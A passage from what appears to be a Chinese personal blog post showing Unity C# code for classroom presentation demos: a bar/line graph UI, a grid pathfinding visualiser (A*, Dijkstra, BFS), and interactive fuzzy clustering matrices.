    dashContainer = graphContainer.Find("dashContainer").GetComponent<RectTransform>();
    dashTemplateX = dashContainer.Find("dashTemplateX").GetComponent<RectTransform>();
    dashTemplateY = dashContainer.Find("dashTemplateY").GetComponent<RectTransform>();
    tooltipGameObject = graphContainer.Find("tooltip").gameObject;

    gameObjectList = new List<GameObject>();
    yLabelList = new List<RectTransform>();
    graphVisualObjectList = new List<IGraphVisualObject>();

    IGraphVisual lineGraphVisual = new LineGraphVisual(graphContainer, dotSprite, Color.green, new Color(1, 1, 1, .5f));
    IGraphVisual barChartVisual = new BarChartVisual(graphContainer, Color.white, .8f);

    // Set up buttons
    transform.Find("barChartBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(barChartVisual);
    };
    transform.Find("lineGraphBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(lineGraphVisual);
    };

    HideTooltip();

    //// Set up base values
    List<int> valueList = new List<int>() { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    ShowGraph(valueList, barChartVisual, -1, (int _i) => "" + (_i), (float _f) => "" + Mathf.RoundToInt(_f));

    }

    public static void ShowTooltip_Static(string tooltipText, Vector2 anchoredPosition) {
    instance.ShowTooltip(tooltipText, anchoredPosition);
    }

    private void ShowTooltip(string tooltipText, Vector2 anchoredPosition) {
    // Show Tooltip GameObject
    tooltipGameObject.SetActive(true);

    tooltipGameObject.GetComponent<RectTransform>().anchoredPosition = anchoredPosition;

    Text tooltipUIText = tooltipGameObject.transform.Find("text").GetComponent<Text>();
    tooltipUIText.text = tooltipText;

    float textPaddingSize = 4f;
    Vector2 backgroundSize = new Vector2(
    tooltipUIText.preferredWidth + textPaddingSize * 2f,
    tooltipUIText.preferredHeight + textPaddingSize * 2f
    );

    tooltipGameObject.transform.Find("background").GetComponent<RectTransform>().sizeDelta = backgroundSize;

    // UI Visibility Sorting based on Hierarchy, SetAsLastSibling in order to show up on top
    tooltipGameObject.transform.SetAsLastSibling();
    }

    public static void HideTooltip_Static() {
    instance.HideTooltip();
    }

    private void HideTooltip() {
    tooltipGameObject.SetActive(false);
    }

    private void SetGetAxisLabelX(Func<int, string> getAxisLabelX) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGetAxisLabelY(Func<float, string> getAxisLabelY) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, getAxisLabelY);
    }

    private void IncreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount + 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void DecreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount - 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGraphVisual(IGraphVisual graphVisual) {
    ShowGraph(this.valueList, graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void ShowGraph(List<int> valueList, IGraphVisual graphVisual, int maxVisibleValueAmount = -1, Func<int, string> getAxisLabelX = null, Func<float, string> getAxisLabelY = null) {
    this.valueList = valueList;
    this.graphVisual = graphVisual;
    this.getAxisLabelX = getAxisLabelX;
    this.getAxisLabelY = getAxisLabelY;

    if (maxVisibleValueAmount <= 0) {
    // Show all if no amount specified
    maxVisibleValueAmount = valueList.Count;
    }
    if (maxVisibleValueAmount > valueList.Count) {
    // Validate the amount to show the maximum
    maxVisibleValueAmount = valueList.Count;
    }

    this.maxVisibleValueAmount = maxVisibleValueAmount;

    // Test for label defaults
    if (getAxisLabelX == null) {
    getAxisLabelX = delegate (int _i) { return _i.ToString(); };
    }
    if (getAxisLabelY == null) {
    getAxisLabelY = delegate (float _f) { return Mathf.RoundToInt(_f).ToString(); };
    }

    // Clean up previous graph
    foreach (GameObject gameObject in gameObjectList) {
    Destroy(gameObject);
    }
    gameObjectList.Clear();
    yLabelList.Clear();

    foreach (IGraphVisualObject graphVisualObject in graphVisualObjectList) {
    graphVisualObject.CleanUp();
    }
    graphVisualObjectList.Clear();

    graphVisual.CleanUp();

    // Grab the width and height from the container
    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    // Set the distance between each point on the graph
    xSize = graphWidth / (maxVisibleValueAmount + 1);

    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    IGraphVisualObject graphVisualObject = graphVisual.CreateGraphVisualObject(new Vector2(xPosition, yPosition), xSize, tooltipText);
    graphVisualObjectList.Add(graphVisualObject);

    // Duplicate the x label template
    RectTransform labelX = Instantiate(labelTemplateX);
    labelX.SetParent(graphContainer, false);
    labelX.gameObject.SetActive(true);
    labelX.anchoredPosition = new Vector2(xPosition, -7f);
    labelX.GetComponent<Text>().text = getAxisLabelX(i);
    gameObjectList.Add(labelX.gameObject);

    // Duplicate the x dash template
    RectTransform dashX = Instantiate(dashTemplateX);
    dashX.SetParent(dashContainer, false);
    dashX.gameObject.SetActive(true);
    dashX.anchoredPosition = new Vector2(xPosition, -3f);
    gameObjectList.Add(dashX.gameObject);

    xIndex++;
    }

    // Set up separators on the y axis
    int separatorCount = 10;
    for (int i = 0; i <= separatorCount; i++) {
    // Duplicate the label template
    RectTransform labelY = Instantiate(labelTemplateY);
    labelY.SetParent(graphContainer, false);
    labelY.gameObject.SetActive(true);
    float normalizedValue = i * 1f / separatorCount;
    labelY.anchoredPosition = new Vector2(-7f, normalizedValue * graphHeight);
    labelY.GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    yLabelList.Add(labelY);
    gameObjectList.Add(labelY.gameObject);

    // Duplicate the dash template
    RectTransform dashY = Instantiate(dashTemplateY);
    dashY.SetParent(dashContainer, false);
    dashY.gameObject.SetActive(true);
    dashY.anchoredPosition = new Vector2(-4f, normalizedValue * graphHeight);
    gameObjectList.Add(dashY.gameObject);
    }
    }

    public void UpdateValue(int index, int value) {
    float yMinimumBefore, yMaximumBefore;
    CalculateYScale(out yMinimumBefore, out yMaximumBefore);

    valueList[index] = value;

    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    bool yScaleChanged = yMinimumBefore != yMinimum || yMaximumBefore != yMaximum;

    if (!yScaleChanged) {
    // Y Scale did not change, update only this value
    float xPosition = xSize + index * xSize;
    float yPosition = ((value - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(value);
    graphVisualObjectList[index].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);
    } else {
    // Y scale changed, update whole graph and y axis labels
    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    graphVisualObjectList[xIndex].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);

    xIndex++;
    }

    for (int i = 0; i < yLabelList.Count; i++) {
    float normalizedValue = i * 1f / yLabelList.Count;
    yLabelList[i].GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    }
    }
    }

    private void CalculateYScale(out float yMinimum, out float yMaximum) {
    // Identify y Min and Max values
    yMaximum = valueList[0];
    yMinimum = valueList[0];

    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    int value = valueList[i];
    if (value > yMaximum) {
    yMaximum = value;
    }
    if (value < yMinimum) {
    yMinimum = value;
    }
    }

    float yDifference = yMaximum - yMinimum;
    if (yDifference <= 0) {
    yDifference = 5f;
    }
    yMaximum = yMaximum + (yDifference * 0.2f);
    yMinimum = yMinimum - (yDifference * 0.2f);

    if (startYScaleAtZero) {
    yMinimum = 0f; // Start the graph at zero
    }
    }

    /*
    * Interface definition for showing visual for a data point
    * */
    private interface IGraphVisual {

    IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Represents a single Visual Object in the graph
    * */
    private interface IGraphVisualObject {

    void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Displays data points as a Bar Chart
    * */
    private class BarChartVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Color barColor;
    private float barWidthMultiplier;

    public BarChartVisual(RectTransform graphContainer, Color barColor, float barWidthMultiplier) {
    this.graphContainer = graphContainer;
    this.barColor = barColor;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void CleanUp() {
    }

    public IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject barGameObject = CreateBar(graphPosition, graphPositionWidth);

    BarChartVisualObject barChartVisualObject = new BarChartVisualObject(barGameObject, barWidthMultiplier);
    barChartVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    return barChartVisualObject;
    }

    private GameObject CreateBar(Vector2graphPosition, float barWidth) {
    GameObject gameObject = new GameObject("bar", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = barColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(barWidth * barWidthMultiplier, graphPosition.y);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.pivot = new Vector2(.5f, 0f);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI barButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    public class BarChartVisualObject : IGraphVisualObject {

    private GameObject barGameObject;
    private float barWidthMultiplier;

    public BarChartVisualObject(GameObject barGameObject, float barWidthMultiplier) {
    this.barGameObject = barGameObject;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = barGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(graphPositionWidth * barWidthMultiplier, graphPosition.y);

    Button_UI barButtonUI = barGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    barButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    barButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };
    }

    public void CleanUp() {
    Destroy(barGameObject);
    }
    }
    }

    /*
    * Displays data points as a Line Graph
    * */
    private class LineGraphVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Sprite dotSprite;
    private LineGraphVisualObject lastLineGraphVisualObject;
    private Color dotColor;
    private Color dotConnectionColor;

    public LineGraphVisual(RectTransform graphContainer, Sprite dotSprite, Color dotColor, Color dotConnectionColor) {
    this.graphContainer = graphContainer;
    this.dotSprite = dotSprite;
    this.dotColor = dotColor;
    this.dotConnectionColor = dotConnectionColor;
    lastLineGraphVisualObject = null;
    }

    public void CleanUp() {
    lastLineGraphVisualObject = null;
    }


    public IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject dotGameObject = CreateDot(graphPosition);


    GameObject dotConnectionGameObject = null;
    if (lastLineGraphVisualObject != null) {
    dotConnectionGameObject = CreateDotConnection(lastLineGraphVisualObject.GetGraphPosition(), dotGameObject.GetComponent<RectTransform>().anchoredPosition);
    }

    LineGraphVisualObject lineGraphVisualObject = new LineGraphVisualObject(dotGameObject, dotConnectionGameObject, lastLineGraphVisualObject);
    lineGraphVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    lastLineGraphVisualObject = lineGraphVisualObject;

    return lineGraphVisualObject;
    }

    private GameObject CreateDot(Vector2 anchoredPosition) {
    GameObject gameObject = new GameObject("dot", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().sprite = dotSprite;
    gameObject.GetComponent<Image>().color = dotColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = anchoredPosition;
    rectTransform.sizeDelta = new Vector2(11, 11);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI dotButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    private GameObject CreateDotConnection(Vector2 dotPositionA, Vector2 dotPositionB) {
    GameObject gameObject = new GameObject("dotConnection", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = dotConnectionColor;
    gameObject.GetComponent<Image>().raycastTarget = false;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    Vector2 dir = (dotPositionB - dotPositionA).normalized;
    float distance = Vector2.Distance(dotPositionA, dotPositionB);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.sizeDelta = new Vector2(distance, 3f);
    rectTransform.anchoredPosition = dotPositionA + dir * distance * .5f;
    rectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    return gameObject;
    }


    public class LineGraphVisualObject : IGraphVisualObject {

    public event EventHandler OnChangedGraphVisualObjectInfo;

    private GameObject dotGameObject;
    private GameObject dotConnectionGameObject;
    private LineGraphVisualObject lastVisualObject;

    public LineGraphVisualObject(GameObject dotGameObject, GameObject dotConnectionGameObject, LineGraphVisualObject lastVisualObject) {
    this.dotGameObject = dotGameObject;
    this.dotConnectionGameObject = dotConnectionGameObject;
    this.lastVisualObject = lastVisualObject;

    if (lastVisualObject != null) {
    lastVisualObject.OnChangedGraphVisualObjectInfo += LastVisualObject_OnChangedGraphVisualObjectInfo;
    }
    }

    private void LastVisualObject_OnChangedGraphVisualObjectInfo(object sender, EventArgs e) {
    UpdateDotConnection();
    }

    public void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = graphPosition;

    UpdateDotConnection();

    Button_UI dotButtonUI = dotGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    dotButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    dotButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };

    if (OnChangedGraphVisualObjectInfo != null) OnChangedGraphVisualObjectInfo(this, EventArgs.Empty);
    }

    public void CleanUp() {
    Destroy(dotGameObject);
    Destroy(dotConnectionGameObject);
    }

    public Vector2 GetGraphPosition() {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    return rectTransform.anchoredPosition;
    }

    private void UpdateDotConnection() {
    if (dotConnectionGameObject != null) {
    RectTransform dotConnectionRectTransform = dotConnectionGameObject.GetComponent<RectTransform>();
    Vector2 dir = (lastVisualObject.GetGraphPosition() - GetGraphPosition()).normalized;
    float distance = Vector2.Distance(GetGraphPosition(), lastVisualObject.GetGraphPosition());
    dotConnectionRectTransform.sizeDelta = new Vector2(distance, 3f);
    dotConnectionRectTransform.anchoredPosition = GetGraphPosition() + dir * distance * .5f;
    dotConnectionRectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    }
    }
    }
    }
    }

    6

    jpg

    A* 算法

    这玩意当时还写了博客:[Unity-Unity 中的网格系统及 AStar 算法-Zi-Zi’s Journey](…/…/…/…/2022/11/11/Unity-Unity 中的网格系统及 AStar 算法/)

    jpg jpg jpg
    **布局**

    ​ 从 主页 - Chess.com 抄的素材和配色。其实这个 PPT 没有上去讲,就当练手了。

    ​ 背景颜色是 #312E2B

    场景逻辑

    ​ 随便整了 Test 类控制所有逻辑,咱就是一个敏捷开发。

    • 切换场景,只有一个场景,一个 Prefab 表示一页 PPT。不仅用鼠标,键盘 A 和 D 也可翻页。
    • 可以使用三种算法:
      • Dijkstra
      • A*
      • BFS
    • 两种棋子代表:8 方向和 4 方向。Z 键切换。

    jpg

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;
    using UnityEngine.UI;

    public class Testing : MonoBehaviour {
    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual; // 算法可视化(分步走)
    [SerializeField] private PathfindingVisual pathfindingVisual; // 显示界面
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding; // 角色行走

    [SerializeField] private Sprite King;
    [SerializeField] private Sprite Rook;
    [SerializeField] private Text mode;
    private Pathfinding pathfinding;
    [SerializeField] private List<GameObject> scenes;
    [SerializeField] private Text sceneIndex;
    private int currentScene = 0;

    private void Start() {
    pathfinding = new Pathfinding(8, 8, true);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    if(x >= 0 && y >= 0 && x < 8 && y < 8)
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }

    if(Input.GetKeyDown(KeyCode.Z))
    {
    pathfinding._8directions = !pathfinding._8directions;
    characterPathfinding.transform.Find("Chessman").GetComponent<SpriteRenderer>().sprite = pathfinding._8directions ? King : Rook;
    }
    if(Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }
    public void changeMode()
    {
    if(pathfinding.mode == 1)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "Dijkstra";
    }
    if (pathfinding.mode == 2)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "BFS";
    }
    if (pathfinding.mode == 3)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "A*";
    }
    pathfinding.mode = pathfinding.mode % 3 + 1;
    }

    public void privousScene()
    {
    if (currentScene == 0)
    currentScene = scenes.Count - 1;
    else
    currentScene -= 1;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    public void nextScene()
    {
    currentScene = (currentScene + 1) % scenes.Count;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    }

    网格系统

    ​ 从 Grid System in Unity (How to make it and where to use it) - YouTube 抄的网格系统以及寻路算法。

    1

    jpg

    2

    jpg

    3

    jpg

    4

    jpg

    5

    jpg

    6

    jpg

    7

    jpg

    模糊聚类分析法

    ​ 老田不想上课让我们上去讲,我上去讲一讲练练手。

    ​ 这个时候已经有 ChatGPT 了,确实很提高效率,但是要讲的东西太复杂了,写了整整两天 orz。

    场景逻辑

    ​ 同样的场景切换逻辑,只有一个 Scene,一个 Prefab 代表一页 PPT。

    ​ 修改了鼠标指针。

    ​ 使用 Dotween 设计了场景切换的动画效果,但是好像路子有点野,有空再学吧!

    using DG.Tweening;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class SceneController : MonoBehaviour
    {
    [SerializeField] private Text indexText;
    [SerializeField] private GameObject scenes;
    private int index = 0;
    private int index_old = 1;

    private GameObject oldScene;
    private GameObject newScene;
    private float timer = 0f;
    private bool changing = false;
    private bool isLeft = false;

    public Texture2D cursorTexture;

    public void OnLeftButton()
    {
    if (changing) return;
    index--;
    if (index == 0)
    {
    index = 7;
    }
    UpdateScene();
    }
    public void OnRightButton()
    {
    if (changing) return;
    index++;
    if (index == 8)
    {
    index = 1;
    }
    UpdateScene();
    }
    private void UpdateScene()
    {
    indexText.text = index + "/7";
    for (int i = 0; i < 7; i++)
    {
    Debug.Log(scenes.transform.GetChild(i).name + "," + index.ToString());
    if (scenes.transform.GetChild(i).name == index.ToString())
    {
    newScene = scenes.transform.GetChild(i).gameObject;
    }
    else if (scenes.transform.GetChild(i).name == index_old.ToString())
    {
    oldScene = scenes.transform.GetChild(i).gameObject;
    }
    else
    {
    scenes.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    if (index_old < index)
    {
    isLeft = true;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(1000, 0, 0);
    }
    else
    {
    isLeft = false;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(-1000, 0, 0);
    }
    newScene.SetActive(true);
    index_old = index;
    timer = 2f;
    }
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    index = 1;
    indexText.text = index + "/7";
    oldScene = scenes.transform.Find("1").gameObject;
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    if(isLeft) {
    oldScene.transform.DOLocalMove(new Vector2(-1000, 0), 2f);
    }else
    oldScene.transform.DOLocalMove(new Vector2(1000, 0), 2f);
    newScene.transform.DOLocalMove(new Vector2(0, 0), 2f);
    }
    }
    }

    1

    jpg

    2

    jpg

    基于模糊等价等价关系的聚类分析法

    ​ 代码复现以及前端效果,拖动 Slider 会改变 λ 的值,从而重新计算分类。

    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene2Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.48, 0.62, 0.41, 0.47},
    {0.48, 1, 0.48, 0.41, 0.47},
    {0.62, 0.48, 1, 0.41, 0.47},
    {0.41, 0.41, 0.41, 1, 0.41},
    {0.47, 0.47, 0.47, 0.41, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnSliderValueChanged();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnSliderValueChanged()
    {
    // 更改数组
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }
    // 输出答案
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

    3

    jpg

    基于模糊相似关系的截距阵分类法

    ​ 用 ChatGPT 抄了个 FuzzyMatrixMultiplication()

    ​ 点击石头可以改变 k 的值。

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private double[,] R_k = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    private int k = 1;
    [SerializeField] private Text kText;
    [SerializeField] private GameObject Stones;
    [SerializeField] private Text supText;
    [SerializeField] private Text supText2;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnChangeK();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnChangeK()
    {
    k *= 2;
    if (k == 16) { k = 1; }
    kText.text = "k=" + k;
    supText.text = supText2.text = k.ToString();
    for (int i = 1; i < 5; i++)
    {
    if (Math.Pow(2, i - 1)<=k)
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color= Color.yellow;
    else
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color = Color.white;
    }
    OnSliderValueChanged();
    }
    public double[,] FuzzyMatrixMultiplication(double[,] matrix, int k)
    {
    double[,] result = (double[,])matrix.Clone(); // 复制一份 matrix
    for (int i = 2; i <= k; i++)
    {
    double[,] temp = new double[matrix.GetLength(0), matrix.GetLength(1)];
    for (int j = 0; j < matrix.GetLength(0); j++)
    {
    for (int l = 0; l < matrix.GetLength(1); l++)
    {
    double temp2 = 0;
    for (int m = 0; m < matrix.GetLength(1); m++)
    {
    double fuzzyValue = Math.Min(result[j, m], matrix[m, l]);
    temp2 = Math.Max(fuzzyValue, temp2);
    }
    temp[j, l] = temp2;
    }
    }
    result = (double[,])temp.Clone(); // 将 temp 的值赋给 result
    }
    return result;
    }
    public void OnSliderValueChanged()
    {
    // 更改数组
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R_k[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
